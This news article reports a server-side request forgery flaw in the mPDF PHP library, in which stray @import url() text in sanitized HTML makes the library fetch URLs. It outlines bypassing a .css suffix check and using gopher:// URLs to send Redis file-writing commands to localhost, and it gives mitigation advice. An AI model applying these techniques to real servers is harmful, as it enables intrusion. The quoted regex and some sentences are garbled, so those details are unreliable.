A subtle logic error in the popular mPDF PHP library allows attackers to trigger unauthorized web requests, potentially exposing internal networks even when user input is sanitized using standard PHP functions.
This flaw affects over 70 million installations on Packagist, a central PHP package repository, putting countless web applications at risk for server-side request forgery (SSRF) attacks.
Security researcher Bruno, known as brun0ne, detailed the issue in a recent Medium post, highlighting how mPDF’s CSS parsing mishandles @import rules.
mPDF converts HTML to PDF documents and is widely used in PHP projects for generating reports and invoices.
Developers often sanitize user-supplied HTML with functions like htmlentities() to prevent injection attacks, converting special characters like < and > into entities such as < lt; and > gt;. However, this protection fails against the library’s flawed regex processing.
How The Flaw Works
The vulnerability arises in mPDF’s WriteHTML method, which calls ReadCSS on the entire input HTML string rather than just CSS sections.
Inside ReadCSS, a preg_match_all function scans for @import url() patterns using a regex like ‘/@import\s+(?:url)?[“]ˊ?([“\sˊ;]+)[“]ˊ?)?[“]ˊ?([“\sˊ;]+)[“]ˊ??;?/i’.
This regex extracts URLs from anywhere in the HTML, including plain text outside <style> tags.
An attacker can inject a payload like which the regex still matches because it ignores quotes and whitespace flexibly. mPDF then uses cURL to fetch the URL, since it supports remote CSS imports that end in .css.
This bypasses typical safeguards since no raw tags are needed. Can the .css requirement be evaded by appending? .css or & .css to URLs without breaking parameters.
Bruno tested this on mPDF 8.2.5 with PHP 8.3, confirming requests to external sites like webhook. Site.
Worse, mPDF’s cURL supports the gopher:// protocol, allowing raw TCP data to be sent to internal ports.
@import rulesAttackers can craft gopher URLs to interact with services like Redis on localhost:6379, sending commands such as “config set dir /tmp/” followed by “save” to write arbitrary files.
This enables port scanning, data exfiltration, or even remote code execution in misconfigured environments.
Implications and Fixes
Reported in May 2025, the issue remains unfixed, and MITRE has rejected CVE status because mPDF expects sanitized input and intentionally fetches external resources.
Maintainers argue it’s a feature request for built-in sanitization, not a vulnerability.
Developers should block special characters like @, (, ),:, /, and ? in user input if they are not needed, or blocklist:// strings.
For apps generating PDFs from user data, additional validation on @import patterns is crucial to prevent SSRF.
While not a zero-day, this quirk underscores the risks posed by third-party libraries when handling untrusted input.
In summary, mPDF’s regex oversight turns a helpful tool into a potential attack vector, urging PHP developers to audit PDF generation code amid rising SSRF threats.
